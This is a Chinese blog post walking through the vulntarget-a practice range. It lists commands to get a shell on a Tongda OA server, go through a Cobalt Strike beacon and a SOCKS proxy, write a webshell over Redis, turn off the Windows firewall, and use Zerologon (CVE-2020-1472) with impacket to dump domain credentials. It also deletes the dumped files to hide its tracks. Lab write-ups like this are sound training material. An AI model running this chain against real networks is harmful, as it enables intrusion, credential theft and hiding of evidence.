vulntarget-a靶场复现

已于 2022-12-29 01:55:48 修改
阅读量1k 收藏 4
点赞数
文章标签: php java 开发语言
于 2022-12-29 01:22:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52158313/article/details/128475365
版权

目录

1、web渗透win7 

1、直接访问发现是通达OA系统​编辑

2、使用liqun工具直接getshell​编辑

 3、使用蚁剑直接连接

4、查看靶机信息​编辑

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

4、配置蚁剑的代理,连接win2016​编辑

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

2、对win2019进行监听​编辑

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原​编辑

1、web渗透win7 

1、直接访问发现是通达OA系统

2、使用liqun工具直接getshell

 3、使用蚁剑直接连接

拿下win7靶机

4、查看靶机信息

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

1、修改teamserver配置端口为54321,将CS文件复制到windows10和kali中

先启动kali中CobaltStrike的服务器端 设置密码为kali,端口为54321,并运行。

./teamserver 192.168.119.131 kali

之后启动windows10客户机端,运行Cobalt_Strike_CN.bat文件,配置信息并连接。

 2、在CobaltStrike创建一个监听器,并生成一个后门

 

 3、上传后门并运行

4、扫描上线的主机10.0.20.98,发现10.0.20.99主机。

5、对发现的10.0.20.99主机进行扫描

得到扫描到开放的端口 

6、对win7主机进行代理

 7、在浏览器中设置代理

 

 8、进行目录扫描,发现网站的绝对路径

phpinfo.php

 2、使用代理工具

 

 在被控端运行windows_x86_agent.exe,进行连接

windows_x86_agent.exe -c 192.168.119.129:19999 -s 123

使用0节点,开启socks代理,设置端口号为18888

在浏览器中设置代理将御剑连通被控端的内网

运用一个代理工具来代理本机工具

将御剑使用proxification代理到本机18888端口

 

 使用cobalt strike和御剑端口扫描工具,发现6379端口,可以利用redis来getshell

 

 3、在kali中利用proxychains4代理redis来GetShell-win2016

在kali中打开proxychains4修改配置文件,把已经通过本机在win7开放的代理端口添加进去

kwrite /ect/proxychains4.conf

socks5 192.168.119.129 18888

 

 使用proxychains4代理redis

proxychains4 redis-cli -h 10.0.20.99

用redis获取shell

查看shel.php是否上传成功

4、配置蚁剑的代理,连接win2016

拿下win2016主机10.0.20.99

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

1、通过蚁剑连接上win2016靶机10.0.20.99后查看信息

发现拥有管理员权限,同时还存在一台内网主机

whoami

ipconfig -all

2、利用cobalt strike对10.0.20.99进行监听,监听端口为6666

 

 3、使用cobalt strike连接发现连接不上并且ping不通,怀疑开了防火墙,接下来尝试关闭靶机win2016的防火墙

shell netsh advfirewall set allprofiles state off

 成功上线win2016

connect 10.0.20.99 6666

 此时在cobalt strike上线了靶机win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

先进行域名解析

先通过蚁剑上传fscan内网扫描工具

将扫描出的结果保存在文本中

fscan64.exe -h 10.0.10.110 >1.txt

查看扫描结果发现DC域控制器win2019

接下来利用CVE-2020-1472漏洞拿下win2019

2、对win2019进行监听

通过win7靶机建立对wn2016的监听

use 0 :19999-----> use 1:10001

在本机服务端创建监听1,端口号为10001

在win2016中运行客户端监听器

在本机端口17777端口成功监听到win2016靶机

先在本机中下载依赖安装

pip3 install -r requirements.txt

 提示本机pip版本过低,先将pip升级

python -m pip install --upgrade pip

 通过CVE-2020-1472_poc验证,发现win2019为DC域控端

python3 zerologon_tester.py WIN201910.0.10.110

 

 

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

在kali中下载impacket依赖安装

python3 -m pip install impacket

python3 -m pip install .

 

 利用impacket得到win2019的哈希值

proxychains4 python3 secretsdump.py VULNTARGET/WIN2019\$@10.0.10.110 -no-pass

 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原

 查看当前路径下的文件,下载sam、security、system文件

 

 

 

 

 清除三个文件的下载记录

del /f sam.save

del /f security.save

del /f system.save

 利用ntm哈希值还原机器账户的哈希值

python3 secretsdumo.py -sam sam.save -system system.save -security security.save LOCAL

   e784e73f9ce07e98f2894b59c2efa422

 还原哈希值

python3 reinstall_original_ow.py WIN2019 10.0.10.110 e784e73f9ce07e98f2894b59c2efa422

 查看是否清理干净

proxychains4 python secretsdump.py -just-dc -no-pass VULNTARGET/WIN2019\$@10.0.10.110

下载地址:

百度云

链接: 百度网盘 请输入提取码 提取码: 2dwq

devil_guoji
关注
Vulntarget-a打靶记录
qu_xiao_lei的博客
01-26 632
由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。这里的原理是:在win2016中上传木马,该木马是将2016的shell反弹至win7中的1111端口,win7中需要用端口转发工具lcx将1111端口中的shell转发至kali的2222端口,这样在kali中监听2222端口就拿到了win2016的shell。
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2614
内容括:通达OA未授权上传+文件含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
LiqunKit-1.5 工具箱介绍
最新发布
gitblog_09783的博客
09-06 452
LiqunKit-1.5 工具箱介绍 项目地址:https://gitcode.com/open-source-toolkit/72153 概述 LiqunKit-1.5 是一个综合漏洞利用工具箱,版本号为 1.5.1。该工具箱旨在为安全研究人员和渗透测试人员提供一个集成的平台,用于测试和利用各种已知的安全漏洞。 功能特点 综合漏洞利用:LiqunKit-1.5 集成了多种常见的漏洞利用工具,方...
VulnTarget-a
大熊
06-16 673
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6689
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1099
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 5042
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Vulntarget-a靶场实战记录
weixin_50398751的博客
06-14 1514
网络结构:域控、内网、外网 使用技术:通达OA系统漏洞 、Redis未授权访问漏洞 、ms17-010永恒之蓝 、代理转发内网跳板、 CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动 、msfconsole、cobalt strike
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
tiancaikunge的博客
06-20 415
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6223
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2948
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
LiqunKit-1.5
06-26
Liqun工具箱1.5.1,综合漏洞利用
LiqunKit-1.5.1.zip
05-14
Liqun工具箱1.5.1,综合漏洞利用
LiqunKit-1.6.2 综合漏洞利用工具交流版,后门自测,建议虚拟机使用
04-08
LiqunKit-1.6.2 综合漏洞利用工具交流版,后门自测,建议虚拟机使用
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
靶场实战】vulntarget-a漏洞靶场实战
TT小子的博客
06-20 954
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vulntarget靶场系列-a-writeup
渗透测试研究中心
12-13 714
网络配置外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adm...
巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我
XYpangSJ的博客
06-01 1051
ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144。配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成。使用proxychains4对10.0.20.99进行端口扫描。修改etc/proxychains4.conf。用procychains4代理使用哥斯拉连接。开放了80端口访问一下phpinfo.php。使用redis未授权访问xieshell。点击target,选择add,如下填写。使用socks_proxy做代理。
vulntarget】系列:vulntarget-a 练习WP
一只爱吃橙子的羊
07-09 828
vulntarget靶场系列,vulntarget-a 练习WP,会持续更新……
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场:sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中含了多个练习关卡,每个关卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些关卡,学习者可以掌握SQL...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值